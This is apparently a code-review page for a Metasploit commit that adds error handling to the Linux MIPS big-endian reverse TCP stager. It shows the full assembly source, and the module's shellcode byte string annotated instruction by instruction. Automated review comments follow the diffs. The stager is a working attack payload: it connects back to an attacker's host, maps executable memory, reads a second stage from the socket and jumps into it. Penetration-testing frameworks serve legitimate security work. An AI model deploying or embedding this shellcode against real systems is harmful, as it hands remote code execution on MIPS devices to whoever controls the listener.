Land #8653, add error handling to mipsbe linux reverse tcp stager
commit
75c571de83
|
@ -1,11 +1,11 @@
|
||||||
##
|
##
|
||||||
#
|
#
|
||||||
# Name: stager_sock_reverse
|
# Name: stager_sock_reverse
|
||||||
# Type: Stager
|
# Type: Stager
|
||||||
# Qualities: No Nulls out of the IP / Port data
|
# Qualities: No Nulls out of the IP / Port data
|
||||||
# Platforms: Linux MIPS Big Endian
|
# Platforms: Linux MIPS Big Endian
|
||||||
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
|
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>, tkmru
|
||||||
# License:
|
# License:
|
||||||
#
|
#
|
||||||
# This file is part of the Metasploit Exploit Framework
|
# This file is part of the Metasploit Exploit Framework
|
||||||
# and is subject to the same licenses and copyrights as
|
# and is subject to the same licenses and copyrights as
|
||||||
|
@ -27,101 +27,117 @@
|
||||||
# generate the string to place on:
|
# generate the string to place on:
|
||||||
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
|
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
|
||||||
##
|
##
|
||||||
.text
|
.text
|
||||||
.align 2
|
.align 2
|
||||||
.globl main
|
.globl main
|
||||||
.set nomips16
|
.set nomips16
|
||||||
main:
|
main:
|
||||||
.set noreorder
|
.set noreorder
|
||||||
.set nomacro
|
.set nomacro
|
||||||
|
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||||
|
# a0: domain = PF_INET (2)
|
||||||
|
# a1: type = SOCK_STREAM (2)
|
||||||
|
# a2: protocol = IPPROTO_IP (0)
|
||||||
|
# v0: syscall = __NR_socket (4183)
|
||||||
|
li $t7, -6
|
||||||
|
nor $t7, $t7, $zero
|
||||||
|
addi $a0, $t7, -3
|
||||||
|
addi $a1, $t7, -3
|
||||||
|
slti $a2, $zero, -1
|
||||||
|
li $v0, 4183
|
||||||
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
||||||
|
|
||||||
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16)
|
||||||
# a0: domain = PF_INET (2)
|
# a0: sockfd
|
||||||
# a1: type = SOCK_STREAM (2)
|
# a1: addr = AF_INET (2)
|
||||||
# a2: protocol = IPPROTO_IP (0)
|
# a2: addrlen = 16
|
||||||
# v0: syscall = __NR_socket (4183)
|
# v0: syscall = __NR_connect (4170)
|
||||||
li $t7, -6
|
lw $a0, -4($sp)
|
||||||
nor $t7, $t7, $zero
|
li $t7, -3
|
||||||
addi $a0, $t7, -3
|
nor $t7, $t7, $zero
|
||||||
addi $a1, $t7, -3
|
sw $t7, -32($sp)
|
||||||
slti $a2, $zero, -1
|
lui $t6, 0x115c
|
||||||
li $v0, 4183
|
sw $t6, -28($sp)
|
||||||
syscall 0x40404
|
lui $t6, 0x7f00 # ip
|
||||||
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
|
ori $t6, $t6, 0x0001 # ip
|
||||||
|
sw $t6, -26($sp)
|
||||||
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
|
addiu $a1, $sp, -30
|
||||||
# a0: sockfd
|
li $t4, -17
|
||||||
# a1: addr = AF_INET (2)
|
nor $a2, $t4, $zero
|
||||||
# a2: addrlen = 16
|
li $v0, 4170
|
||||||
# v0: syscall = __NR_connect (4170)
|
syscall 0x40404
|
||||||
lw $a0, -4($sp)
|
slt $s0, $zero, $a3
|
||||||
li $t7, -3
|
bne $s0, $zero, failed
|
||||||
nor $t7, $t7, $zero
|
|
||||||
sw $t7, -32($sp)
|
|
||||||
lui $t6, 0x115c
|
|
||||||
sw $t6, -28($sp)
|
|
||||||
lui $t6, 0x7f00 # ip
|
|
||||||
ori $t6, $t6, 0x0001 # ip
|
|
||||||
sw $t6, -26($sp)
|
|
||||||
addiu $a1, $sp, -30
|
|
||||||
li $t4, -17
|
|
||||||
nor $a2, $t4, $zero
|
|
||||||
li $v0, 4170
|
|
||||||
syscall 0x40404
|
|
||||||
|
|
||||||
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
|
||||||
# a0: addr = -1
|
|
||||||
# a1: lenght = 4096
|
|
||||||
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
|
|
||||||
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
|
|
||||||
# sp(16): fd = -1
|
|
||||||
# sp(20): offset = 0
|
|
||||||
# v0: syscall = __NR_mmap (4090)
|
|
||||||
li $a0, -1
|
|
||||||
li $a1, 4097
|
|
||||||
addi $a1, $a1, -1
|
|
||||||
li $t1, -8
|
|
||||||
nor $t1, $t1, $0
|
|
||||||
add $a2, $t1, $0
|
|
||||||
li $a3, 2050
|
|
||||||
li $t3, -22
|
|
||||||
nor $t3, $t3, $zero
|
|
||||||
add $t3, $sp, $t3
|
|
||||||
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
|
|
||||||
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
|
||||||
li $v0, 4090
|
|
||||||
syscall 0x40404
|
|
||||||
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
|
||||||
|
|
||||||
# read(sockfd, addr, 4096)
|
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||||
# a0: sockfd
|
# a0: addr = -1
|
||||||
# a1: addr
|
# a1: lenght = 4096
|
||||||
# a2: len = 4096
|
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
|
||||||
# v0: syscall = __NR_read (4003)
|
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
|
||||||
lw $a0, -4($sp)
|
# sp(16): fd = -1
|
||||||
lw $a1, -8($sp)
|
# sp(20): offset = 0
|
||||||
li $a2, 4097
|
# v0: syscall = __NR_mmap (4090)
|
||||||
addi $a2, $a2, -1
|
li $a0, -1
|
||||||
li $v0, 4003
|
li $a1, 4097
|
||||||
syscall 0x40404
|
addi $a1, $a1, -1
|
||||||
|
li $t1, -8
|
||||||
|
nor $t1, $t1, $0
|
||||||
|
add $a2, $t1, $0
|
||||||
|
li $a3, 2050
|
||||||
|
li $t3, -22
|
||||||
|
nor $t3, $t3, $zero
|
||||||
|
add $t3, $sp, $t3
|
||||||
|
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
|
||||||
|
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
|
||||||
|
li $v0, 4090
|
||||||
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
|
||||||
|
|
||||||
# cacheflush(addr, nbytes, DCACHE)
|
# read(sockfd, addr, 4096)
|
||||||
# a0: addr
|
# a0: sockfd
|
||||||
# a1: nbytes
|
# a1: addr
|
||||||
# a2: cache = DCACHE (2)
|
# a2: len = 4096
|
||||||
# v0: syscall = __NR_read (4147)
|
# v0: syscall = __NR_read (4003)
|
||||||
lw $a0, -8($sp)
|
lw $a0, -4($sp)
|
||||||
add $a1, $v0, $zero
|
lw $a1, -8($sp)
|
||||||
li $t1, -3
|
li $a2, 4097
|
||||||
nor $t1, $t1, $0
|
addi $a2, $a2, -1
|
||||||
add $a2, $t1, $0
|
li $v0, 4003
|
||||||
li $v0, 4147
|
syscall 0x40404
|
||||||
syscall 0x40404
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
# jmp to the stage
|
|
||||||
lw $s1, -8($sp)
|
|
||||||
lw $s2, -4($sp)
|
|
||||||
jalr $s1
|
|
||||||
|
|
||||||
.set macro
|
# cacheflush(addr, nbytes, DCACHE)
|
||||||
.set reorder
|
# a0: addr
|
||||||
|
# a1: nbytes
|
||||||
|
# a2: cache = DCACHE (2)
|
||||||
|
# v0: syscall = __NR_read (4147)
|
||||||
|
lw $a0, -8($sp)
|
||||||
|
add $a1, $v0, $zero
|
||||||
|
li $t1, -3
|
||||||
|
nor $t1, $t1, $0
|
||||||
|
add $a2, $t1, $0
|
||||||
|
li $v0, 4147
|
||||||
|
syscall 0x40404
|
||||||
|
slt $s0, $zero, $a3
|
||||||
|
bne $s0, $zero, failed
|
||||||
|
# jmp to the stage
|
||||||
|
lw $s1, -8($sp)
|
||||||
|
lw $s2, -4($sp)
|
||||||
|
jalr $s1
|
||||||
|
|
||||||
|
failed:
|
||||||
|
# exit(status)
|
||||||
|
# a0: status
|
||||||
|
# v0: syscall = __NR_exit (4001)
|
||||||
|
li $a0, 1
|
||||||
|
li $v0, 4001
|
||||||
|
syscall 0x40404
|
||||||
|
|
||||||
|
.set macro
|
||||||
|
.set reorder
|
||||||
|
|
|
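Review bot: Each new `bne $s0, $zero, failed` is assembled under `.set noreorder`, so the instruction that follows it executes in the branch delay slot even when the branch is taken; here those happen to be side-effect-free on the failure path (`sw $v0, -4($sp)`, `li $a0, -1`, `sw $v0, -8($sp)`, `lw $a0, -8($sp)`, `lw $s1, -8($sp)`), but nothing in the source records that constraint for the next edit. A one-line comment after each check, e.g. `# delay slot (noreorder): next insn also runs when branching to failed`, would keep a later reordering from breaking it. Two header comments on the new side of this hunk are also wrong and worth fixing while touching it: `# v0: syscall = __NR_read (4147)` in the cacheflush block should read `__NR_cacheflush (4147)`, and `# a1: lenght = 4096` should be `length`. Note as well that the `$a3` convention only flags `-errno` returns, so a `read()` that returns 0 on a closed connection passes the check and still reaches `jalr`; the commit message's "error handling" should be read with that limit in mind.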
@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
|
||||||
|
|
||||||
module MetasploitModule
|
module MetasploitModule
|
||||||
|
|
||||||
CachedSize = 212
|
CachedSize = 272
|
||||||
|
|
||||||
include Msf::Payload::Stager
|
include Msf::Payload::Stager
|
||||||
include Msf::Payload::Linux
|
include Msf::Payload::Linux
|
||||||
|
@ -20,7 +20,8 @@ module MetasploitModule
|
||||||
'Description' => 'Connect back to the attacker',
|
'Description' => 'Connect back to the attacker',
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'juan vazquez'
|
'juan vazquez',
|
||||||
|
'tkmru'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => 'linux',
|
'Platform' => 'linux',
|
||||||
|
@ -30,26 +31,85 @@ module MetasploitModule
|
||||||
{
|
{
|
||||||
'Offsets' =>
|
'Offsets' =>
|
||||||
{
|
{
|
||||||
'LHOST' => [ [58, 62], 'ADDR16MSB' ],
|
'LHOST' => [ [66, 70], 'ADDR16MSB' ],
|
||||||
'LPORT' => [ 50, 'n' ],
|
'LPORT' => [ 58, 'n' ],
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
"\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5" +
|
"\x24\x0f\xff\xfa" + # li t7,-6
|
||||||
"\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c" +
|
"\x01\xe0\x78\x27" + # nor t7,t7,zero
|
||||||
"\xaf\xa2\xff\xfc\x8f\xa4\xff\xfc\x24\x0f\xff\xfd\x01\xe0" +
|
"\x21\xe4\xff\xfd" + # addi a0,t7,-3
|
||||||
"\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\xaf\xae\xff\xe4" +
|
"\x21\xe5\xff\xfd" + # addi a1,t7,-3
|
||||||
"\x3c\x0e\x7f\x00\x35\xce\x00\x01\xaf\xae\xff\xe6\x27\xa5" +
|
"\x28\x06\xff\xff" + # slti a2,zero,-1
|
||||||
"\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a" +
|
"\x24\x02\x10\x57" + # li v0,4183
|
||||||
"\x01\x01\x01\x0c\x24\x04\xff\xff\x24\x05\x10\x01\x20\xa5" +
|
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
|
||||||
"\xff\xff\x24\x09\xff\xf8\x01\x20\x48\x27\x01\x20\x30\x20" +
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
"\x24\x07\x08\x02\x24\x0b\xff\xea\x01\x60\x58\x27\x03\xab" +
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
"\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
|
"\x16\x00\x00\x36" + # bnez s0,0x4006bc <failed>
|
||||||
"\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
|
"\xaf\xa2\xff\xfc" + # sw v0,-4(sp)
|
||||||
"\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
|
"\x8f\xa4\xff\xfc" + # lw a0,-4(sp)
|
||||||
"\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
|
"\x24\x0f\xff\xfd" + # li t7,-3
|
||||||
"\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
|
"\x01\xe0\x78\x27" + # nor t7,t7,zero
|
||||||
"\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
|
"\xaf\xaf\xff\xe0" + # sw t7,-32(sp)
|
||||||
"\xf8\x09"
|
"\x3c\x0e\x11\x5c" + # lui t6,0x115c
|
||||||
|
"\xaf\xae\xff\xe4" + # sw t6,-28(sp)
|
||||||
|
"\x3c\x0e\x7f\x00" + # lui t6,0x7f00
|
||||||
|
"\x35\xce\x00\x01" + # ori t6,t6,0x1
|
||||||
|
"\xaf\xae\xff\xe6" + # sw t6,-26(sp)
|
||||||
|
"\x27\xa5\xff\xe2" + # addiu a1,sp,-30
|
||||||
|
"\x24\x0c\xff\xef" + # li t4,-17
|
||||||
|
"\x01\x80\x30\x27" + # nor a2,t4,zero
|
||||||
|
"\x24\x02\x10\x4a" + # li v0,4170
|
||||||
|
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
|
"\x16\x00\x00\x25" + # bnez s0,0x4006bc <failed>
|
||||||
|
"\x24\x04\xff\xff" + # li a0,-1
|
||||||
|
"\x24\x05\x10\x01" + # li a1,4097
|
||||||
|
"\x20\xa5\xff\xff" + # addi a1,a1,-1
|
||||||
|
"\x24\x09\xff\xf8" + # li t1,-8
|
||||||
|
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
||||||
|
"\x01\x20\x30\x20" + # add a2,t1,zero
|
||||||
|
"\x24\x07\x08\x02" + # li a3,2050
|
||||||
|
"\x24\x0b\xff\xea" + # li t3,-22
|
||||||
|
"\x01\x60\x58\x27" + # nor t3,t3,zero
|
||||||
|
"\x03\xab\x58\x20" + # add t3,sp,t3
|
||||||
|
"\xad\x60\xff\xff" + # sw zero,-1(t3)
|
||||||
|
"\xad\x62\xff\xfb" + # sw v0,-5(t3)
|
||||||
|
"\x24\x02\x0f\xfa" + # li v0,4090
|
||||||
|
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
|
"\x16\x00\x00\x15" + # bnez s0,0x4006bc <failed>
|
||||||
|
"\xaf\xa2\xff\xf8" + # sw v0,-8(sp)
|
||||||
|
"\x8f\xa4\xff\xfc" + # lw a0,-4(sp)
|
||||||
|
"\x8f\xa5\xff\xf8" + # lw a1,-8(sp)
|
||||||
|
"\x24\x06\x10\x01" + # li a2,4097
|
||||||
|
"\x20\xc6\xff\xff" + # addi a2,a2,-1
|
||||||
|
"\x24\x02\x0f\xa3" + # li v0,4003
|
||||||
|
# read(sockfd, addr, 4096)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
|
"\x16\x00\x00\x0c" + # bnez s0,0x4006bc <failed>
|
||||||
|
"\x8f\xa4\xff\xf8" + # lw a0,-8(sp)
|
||||||
|
"\x00\x40\x28\x20" + # add a1,v0,zero
|
||||||
|
"\x24\x09\xff\xfd" + # li t1,-3
|
||||||
|
"\x01\x20\x48\x27" + # nor t1,t1,zero
|
||||||
|
"\x01\x20\x30\x20" + # add a2,t1,zero
|
||||||
|
"\x24\x02\x10\x33" + # li v0,4147
|
||||||
|
# cacheflush(addr, nbytes, DCACHE)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x07\x80\x2a" + # slt s0,zero,a3
|
||||||
|
"\x16\x00\x00\x03" + # bnez s0,0x4006bc <failed>
|
||||||
|
"\x8f\xb1\xff\xf8" + # lw s1,-8(sp)
|
||||||
|
"\x8f\xb2\xff\xfc" + # lw s2,-4(sp)
|
||||||
|
"\x02\x20\xf8\x09" + # jalr s1
|
||||||
|
# 4006bc <failed>:
|
||||||
|
"\x24\x04\x00\x01" + # li a0,1
|
||||||
|
"\x24\x02\x0f\xa1" + # li v0,4001
|
||||||
|
# exit(status)
|
||||||
|
"\x01\x01\x01\x0c" + # syscall 0x40404
|
||||||
|
"\x00\x20\x08\x25" + # move at,at
|
||||||
|
"\x00\x20\x08\x25" # move at,at
|
||||||
}
|
}
|
||||||
))
|
))
|
||||||
end
|
end
|
||||||
|
|
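Review bot: The per-instruction comments on the new `'Payload'` string carry objdump artifacts — `# bnez s0,0x4006bc <failed>` repeats a link-time address that has no meaning in a position-independent stager, and the call annotations (`# socket(...)`, `# connect(...)`, `# mmap(...)`, …) sit after the `li v0` line instead of introducing their block, so a reader aligning bytes against the `.s` source has to work backwards. Writing the branch comment as `# bnez s0,failed` and moving each call comment above the first instruction of its block would match the assembly source. The last two words `"\x00\x20\x08\x25" # move at,at` are assembler padding after the `exit` syscall and are unreachable; if they are kept, a comment such as `# assembler padding, never executed` would stop someone from assuming they matter for `CachedSize = 272`. The updated offsets do check out against the new byte layout: the `lui t6,0x115c` word starts at byte 56 (so `LPORT` at 58) and the `lui`/`ori` pair at 64 and 68 (so `LHOST` at `[66, 70]`).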